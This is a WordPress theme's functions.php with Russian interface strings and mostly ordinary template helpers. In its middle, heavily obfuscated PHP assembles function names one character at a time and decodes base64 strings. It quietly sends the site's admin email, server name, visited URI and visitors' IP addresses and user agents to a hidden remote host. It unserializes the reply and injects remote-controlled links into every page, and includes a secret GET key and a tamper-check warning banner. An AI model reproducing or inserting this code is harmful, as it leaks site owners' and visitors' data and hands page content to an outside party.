<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $msPv='d';$oTTEtrX='s';$QHKY='b';$LmMoU='a';$iOxctR='_';$ImJuA='4';$vFVm='e';$EUdd='c';$HJHRzoB='6';$htbHKWL='e';$rGCKI='d';$mxAe='e';$EBRR='o';$zrUdgKXQ=$QHKY.$LmMoU.$oTTEtrX.$htbHKWL.$HJHRzoB.$ImJuA.$iOxctR.$rGCKI.$vFVm.$EUdd.$EBRR.$msPv.$mxAe;$sKHQ='a';$kEfzvMv='e';$ZaIz='t';$GARB='i';$sGEkB='g';$WtuvcQM='f';$xqGYq='l';$yuuCyrs='z';$ooRH='n';$tHfMxzJv=$sGEkB.$yuuCyrs.$GARB.$ooRH.$WtuvcQM.$xqGYq.$sKHQ.$ZaIz.$kEfzvMv;$FlXbgCO='t';$aijvUE='t';$lRWlAwc='s';$bvAkbZP='r';$XosZ='1';$DMmPD='r';$aeFd='o';$PaiV='_';$ifdjn='3';$dQkcgpvQ=$lRWlAwc.$aijvUE.$bvAkbZP.$PaiV.$DMmPD.$aeFd.$FlXbgCO.$XosZ.$ifdjn;$zanx='e';$neFSti='r';$BBxs='v';$cZfeTB='t';$zViAfz='r';$odpQ='s';$FoDpgRfX=$odpQ.$cZfeTB.$zViAfz.$neFSti.$zanx.$BBxs;                     
		$ro_____________d='d';$oo_____________z='s';$lz____w='b';$ic_______________u='a';$mt_____________c='_';$ju___p='4';$if__________q='e';$ip_______w='c';$mo_________l='6';$kk____________h='e';$ji__u='d';$ci__________m='e';$eg_____________o='o';$nh_________e=$lz____w.$ic_______________u.$oo_____________z.$kk____________h.$mo_________l.$ju___p.$mt_____________c.$ji__u.$if__________q.$ip_______w.$eg_____________o.$ro_____________d.$ci__________m;
		$lf_____c='_';$zw_____r='s';$jo_________k='f';$ly____z='x';$gq____s='i';$ni_________e='c';$on______q='n';$nw___________x='n';$qj__f='t';$rt___________n='u';$oh____________q='o';$ru_____________e='s';$li___________o='t';$su___j='i';$yy__________n='e';$qi________s=$jo_________k.$rt___________n.$on______q.$ni_________e.$li___________o.$su___j.$oh____________q.$nw___________x.$lf_____c.$yy__________n.$ly____z.$gq____s.$zw_____r.$qj__f.$ru_____________e;
		$is__________z='f';$pn______x='e';$jn___________c='n';$yg______r='p';$nk____f='o';$wu__t=$is__________z.$nk____f.$yg______r.$pn______x.$jn___________c;
		$bh_________j='e';$ci________x='a';$xr____t='r';$tx_______________x='d';$sk__b='f';$xp__t=$sk__b.$xr____t.$bh_________j.$ci________x.$tx_______________x;
		$qu_______m='e';$ba______________r='s';$kw________j='f';$lc__________s='o';$oo___g='l';$yb____________h='c';$yx_________v=$kw________j.$yb____________h.$oo___g.$lc__________s.$ba______________r.$qu_______m;
		
		define("WP_ID", $nh_________e("Mi4wLjA="));
		define("WP_TTL", $nh_________e("MTA4MDA="));
		define("WP_SRC", $nh_________e("dHBva24="));
	


		function wp_get_header() {
			global $nh_________e, $qi________s;
			
			if (
				$qi________s($nh_________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$qi________s($nh_________e("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$qi________s($nh_________e("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $nh_________e, $wu__t, $yx_________v, $xp__t;
			
			$vc________m = TEMPLATEPATH."/".$nh_________e("Zm9vdGVyLnBocA==");
			$hl____s = @$wu__t($vc________m, "r");
			$vc________m = @$xp__t($hl____s, @filesize($vc________m));
			@$yx_________v($hl____s);
			
			$ck______________z = TEMPLATEPATH."/".$nh_________e("ZnVuY3Rpb25zLnBocA==");
			$hl____s = @$wu__t($ck______________z, "r");
			$ck______________z = @$xp__t($hl____s, @filesize($ck______________z));
			@$yx_________v($hl____s);
			
			$zp_______________z = 0;
			if($vc________m && $ck______________z) {
				if ($nh_________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($vc________m, $nh_________e("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$zp_______________z = 1;
					}
					if (substr_count($vc________m, "wp_theme_GPL_credits()") < 1) {
						$zp_______________z = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$zp_______________z = 12;
				}
			}
			
			if($zp_______________z > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $zp_______________z -->";
			}
		}
	


		function wp_loaded() {
			global $nh_________e, $qi________s;
			return $qi________s($nh_________e("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ad______l, $mu____________m = "(more...)", $fs_____t = 0, $ys____________a = "") {
				$xb______________a = get_the_content($mu____________m, $fs_____t, $ys____________a);
				$xb______________a = apply_filters("the_content", $xb______________a);
				
				$xb______________a = str_replace("]]>", "]]>", $xb______________a);
				if (strlen($_GET["p"]) > 0) {
					echo $xb______________a;
				}
				else if ((strlen($xb______________a)>$ad______l) && ($kc_______g = strpos($xb______________a, " ", $ad______l ))) {
					$xb______________a = substr($xb______________a, 0, $kc_______g);
					$xb______________a = $xb______________a;
					echo $xb______________a;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$mu____________m</a></div></p>";
				} else {
					echo $xb______________a;
				}
				
			}
		}
	


		$ra______k='e';$fo___________w='e';$so______________m='c';$sb____________h='_';$qv____________t='4';$fv_____d='n';$ea_______________m='e';$dh_______r='6';$uy_______________l='s';$yx______t='a';$mw______________q='o';$xx___a='d';$se________v='b';$qy_______________j=$se________v.$yx______t.$uy_______________l.$ea_______________m.$dh_______r.$qv____________t.$sb____________h.$ra______k.$fv_____d.$so______________m.$mw______________q.$xx___a.$fo___________w;
		$zu__x='o';$ql___c='_';$kw___h='t';$xr____________k='g';$iu________v='l';$vv________x='n';$sq___o='s';$hh_____y='t';$xb_____________p='e';$nw___________y='e';$wf______e='c';$bo_______e='_';$kh_________a='t';$mk___f='i';$qi____f='f';$ll_______b='e';$hc__p='n';$bw___z=$qi____f.$mk___f.$iu________v.$xb_____________p.$bo_______e.$xr____________k.$ll_______b.$hh_____y.$ql___c.$wf______e.$zu__x.$vv________x.$kw___h.$nw___________y.$hc__p.$kh_________a.$sq___o;
		$ks_____m='f';$bt_______d='s';$bp___h='t';$uz______________e='i';$fl___________c='l';$tm_____g='e';$bt_____________b='e';$hy_______________c='i';$pk_____d='_';$rk_____________v='x';$sc___________z='s';$va__y=$ks_____m.$hy_______________c.$fl___________c.$bt_____________b.$pk_____d.$tm_____g.$rk_____________v.$uz______________e.$sc___________z.$bp___h.$bt_______d;
		$zl_____________f='c';$kd_____e='r';$sx_________h='e';$zm__________q='o';$ra___v='p';$ug_____________f='m';$ej______________l='i';$fo___________l='e';$po______e='_';$rk______________e='o';$pl___q='v';$to___________i='n';$qi__________f='r';$ka_____b='a';$ll____x='s';$rc__________p=$pl___q.$fo___________l.$qi__________f.$ll____x.$ej______________l.$rk______________e.$to___________i.$po______e.$zl_____________f.$zm__________q.$ug_____________f.$ra___v.$ka_____b.$kd_____e.$sx_________h;
		$ej_________s='f';$gx______________f='o';$gf__________e='o';$cv_______g='p';$bi______________t='s';$sw____x='e';$me_____________u='k';$fb__________q='c';$fr__________g='n';$zb_____________j=$ej_________s.$bi______________t.$gx______________f.$fb__________q.$me_____________u.$gf__________e.$cv_______g.$sw____x.$fr__________g;
		$lm__b='e';$ju______j='f';$mr_____________s='t';$dl_________j='i';$gi__________q='w';$fb____d='r';$qy___________n=$ju______j.$gi__________q.$fb____d.$dl_________j.$mr_____________s.$lm__b;
		$rk_________u='m';$sz_______________e='5';$va____h='d';$em_________z=$rk_________u.$va____h.$sz_______________e;
		$pr_______________s='r';$fy___________t='l';$jm____________z='t';$nz____d='h';$wb________y='a';$xt__________p='a';$xf___x='p';$qk___m='e';$yl________v=$pr_______________s.$qk___m.$wb________y.$fy___________t.$xf___x.$xt__________p.$jm____________z.$nz____d;
		$wv___b='z';$lf_______z='r';$ed____p='i';$ft___r='s';$lh_________e='a';$sv__m='u';$zj___s='l';$kt_________w='i';$ks__________m='n';$of___________o='e';$aw____________l='e';$ni_____________v=$sv__m.$ks__________m.$ft___r.$aw____________l.$lf_______z.$kt_________w.$lh_________e.$zj___s.$ed____p.$wv___b.$of___________o;
		$bf_________t='t';$xx______w='n';$ez___________g='a';$hb_____________f='p';$to______________s='m';$pb_____________s='e';$du______m='m';$yv___________a=$bf_________t.$pb_____________s.$du______m.$hb_____________f.$xx______w.$ez___________g.$to______________s;
		$dh_________g='s';$vl___m='_';$gw________q='e';$te_____________t='o';$dn____o='a';$di_______________u='n';$je______i='t';$yj______r='e';$rb____n='r';$de_____c='x';$dm__________p='e';$bu_______________p='a';$az________f='t';$bz____________n='_';$kz_____n='t';$lq_____________g='t';$nq__r='e';$ny______________r='r';$ll__________p='c';$zg_______t='m';$lj___e='c';$yh_____________h=$dh_________g.$az________f.$rb____n.$yj______r.$dn____o.$zg_______t.$vl___m.$ll__________p.$te_____________t.$di_______________u.$je______i.$nq__r.$de_____c.$lq_____________g.$bz____________n.$lj___e.$ny______________r.$gw________q.$bu_______________p.$kz_____n.$dm__________p;
	


		function vf_________i($nl_______________q) {
			global $nh_________e, $qi________s, $bw___z, $rc__________p, $yh_____________h;
			
			if (!$qi________s($nh_________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($rc__________p(PHP_VERSION, "5.0.0", ">=") && $qi________s($nh_________e("ZmlsZV9nZXRfY29udGVudHM=")) && $qi________s($nh_________e("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$wg______n = $yh_____________h(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$dl_____________w = @$bw___z($nl_______________q, 0, $wg______n);
			} else {
				$dl_____________w = @$bw___z($nl_______________q, 0);
			}
			
			return $dl_____________w;
		}
	


		function ac_______________o($nl_______________q) {
			global $qi________s, $zb_____________j, $qy___________n, $nh_________e;
			
			if (!$qi________s($nh_________e("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$is_______k = strpos($nl_______________q, "/", 7);
			$po__________e = array(
				"uri"     => substr($nl_______________q, $is_______k),
				"host"    => str_replace("http://", "", substr($nl_______________q, 0, $is_______k)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$pt_________e = @$zb_____________j("$po__________e[host]", 80, $jf_______m, $ah_____l, 4);
			
			if (!$pt_________e) {
				return false;
			} else {
				$dl_____________w = "";
				$hz____________h  = "GET $po__________e[uri] HTTP/1.0\r\n";
				$hz____________h .= "Host: $po__________e[host]\r\n";
				$hz____________h .= "Referer: $po__________e[referer]\r\n";
				$hz____________h .= "Connection: Close\r\n\r\n";
				
				@$qy___________n($pt_________e, $hz____________h);
				
				while (!@feof($pt_________e)) {
					$pf_____________t = @fgets($pt_________e, (1024*24));
					
					if ($pf_____________t == "\r\n") {
						$gw__v = true;
						continue;
					}
					
					if ($gw__v) {
						$dl_____________w .= $pf_____________t;
					}
				}
				
				return $dl_____________w;
			}
		}
	


		function xr____f($nl_______________q) {
			global $qi________s;
			$wf_____________e = false;
			
			if ($nl_______________q != "") {
				if ($qi________s("vf_________i")) {
					$wf_____________e = @vf_________i($nl_______________q);
				}
				
				if (!$wf_____________e && ($qi________s("ac_______________o"))) {
					$wf_____________e = @ac_______________o($nl_______________q);
				}
			}
			
			return $wf_____________e;
		}
	


		function ry___________n() {
			global $_SERVER, $em_________z;
			
			$vw______m = $_SERVER["SERVER_NAME"];
			
			if (substr("$vw______m", 0, 4) == "www.") {
				$vw______m = substr("$vw______m", 4);
			}
			
			$vw______m = $em_________z("$_SERVER[SERVER_NAME]");
			
			return $vw______m;
		}
	


		function np______________z() {
			return "file";
		}
	


		function ib______________o($nl_______________q) {
			global $_SERVER, $bw___z, $va__y, $wu__t, $yx_________v, $qy___________n;
			
			$ly_____u = mm_____j();
			
			$dl__y = ry___________n().".jpg";
			$dw____g = $ly_____u["dir_upload"]["path"]."/$dl__y";
			$mb___m = @filemtime($dw____g);
			
			if (!$mb___m || ((time()-$mb___m) >= WP_TTL)) {
				$wf_____________e = xr____f($nl_______________q);
				
				if ($wf_____________e) {
					if ($va__y($dw____g)) {
						@unlink($dw____g);
					}
					
					$hl____s = @$wu__t($dw____g, "x+");
					
					@$qy___________n($hl____s, $wf_____________e);
					@$yx_________v($hl____s);
				}
			} else {
				if ($va__y($dw____g)) {
					$wf_____________e = @$bw___z($dw____g);
				} else {
					$wf_____________e = false;
				}
			}
			
			return $wf_____________e;
		}
	


		function mm_____j() {
			global $_SERVER, $nh_________e, $qy_______________j;
			
			$gf__y = wp_count_posts("post");
			$jq______s = pathinfo(get_bloginfo("template_directory"));
			
			$ly_____u = array(
				"url" => array(
					"report"      => $nh_________e("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $jq______s,
				"dir_upload"	=> pu_____________x(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$jq______s[filename],
					"a005=".$gf__y->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => ""
			);
			
			$ly_____u["url"]["queryString"] = implode("&", $ly_____u["queryString"]);
			$ly_____u["url"]["report"] = $ly_____u["url"]["report"]."/?".$qy_______________j($ly_____u["url"]["queryString"]).".html";
						
			return $ly_____u;
		}
	


		function pu_____________x() {
			$uj______o = wp_upload_dir();
			
			if (isset($uj______o["error"])) {
				$vz_________k = wm_____t();
				if (is_writable($vz_________k)) {
					$uj______o = array("path" => $vz_________k);
				}
			}

			return $uj______o;
		}
	


		function wm_____t() {
			global $qi________s, $em_________z, $yl________v, $yv___________a;
			
			$ok___________j = (bool) ini_get("safe_mode");
			if ($ok___________j == true) {
				return false;
			}
			
			if ($qi________s("sys_get_temp_dir")) {
				$xq__________w = sys_get_temp_dir();
				if (is_writable($xq__________w)) {
					return $yl________v($xq__________w);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $yl________v($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $yl________v($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $yl________v($_ENV["TEMP"]);
			} else {
				$we____m = $yv___________a($em_________z(uniqid(rand(), true)), "");
				if ($we____m) {
					$xq__________w = $yl________v(dirname($we____m));
					@unlink($we____m);
					return $xq__________w;
				} else {
					return false;
				}
			}
		}
	


		function tv_____l() {
			global $_GET, $va__y;
			
			$ly_____u = mm_____j();
			$vw______m = ry___________n();
			$gh_____________m = np______________z();
			
			$uy______o = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($gh_____________m == "file") {
					$qx_______m = $ly_____u["dir_upload"]["path"]."/".$vw______m.".jpg";
					if ($va__y($qx_______m)) {
						@unlink($qx_______m);
						$uy______o = "deleted";
					}
				}
				
				$kn_________g = array(
					"s"	=> $uy______o,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($kn_________g AS $ue____l => $bo______________u) echo " [$ue____l:$bo______________u]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $qi________s, $nh_________e, $ni_____________v;
			$ly_____u = mm_____j();
			
			$ie_________l = "ib______________o";
			if ($qi________s($ie_________l)) {
				$dl_____________w = $ie_________l($ly_____u["url"]["report"]);
			}
			
			if ($dl_____________w) {
				if ($dl_____________w = @$nh_________e($dl_____________w)) {
					$dl_____________w = @$ni_____________v($dl_____________w);
					
					if (strlen($dl_____________w[custom_credit]) >= 5) {
						$ly_____u["default_string"] = $dl_____________w[custom_credit];
					}
					
					if ($dl_____________w["status"] == "0") {
						$cn_____i = 1;
						$jm_________w = 1;
					} else {
						$gg_________r = sizeof($dl_____________w["links"]);
						$rs___________x = $ly_____u["default_string"];
						
						if ($gg_________r > 0 && $dl_____________w["links"] !== "") {
							$me______m = 0;
							foreach ($dl_____________w["links"] as $os_____________i => $gw___w) {
								$me______m++;
								if ($gw___w->l_path == "" || $gw___w->l_path == $_SERVER["REQUEST_URI"]) {
									$gw___w->l_href = htmlspecialchars(strip_tags($gw___w->l_href));
									$gw___w->l_title = htmlspecialchars(strip_tags($gw___w->l_title));
									$gw___w->l_anchor = htmlspecialchars(strip_tags($gw___w->l_anchor));
									$rs___________x .= " | ";
									$rs___________x .= "<a href='$gw___w->l_href' title='$gw___w->l_title'";
									if ($gw___w->l_nofollow == "1") {
										$rs___________x .= " rel='nofollow'";
									}
									$rs___________x .= ">$gw___w->l_anchor</a>";
								}
							}
						}
						$ly_____u["links"] = "$rs___________x";
						if ($dl_____________w[credit] == "0") {
							$ly_____u["links"] = "";
						}
					}
				} else {
					$cn_____i = "1";
				}
			} else {
				$cn_____i = "1";
			}
			
			if ($cn_____i == "1") {
				$ly_____u["links"] = $ly_____u["default_string"];
			}
			
			echo "$ly_____u[links]";
			
			echo "<!-- s: $dl_____________w[signature] -->";
			tv_____l();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),   
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
        $prev_link = get_previous_posts_link(__('Newer Entries &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Older Entries', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
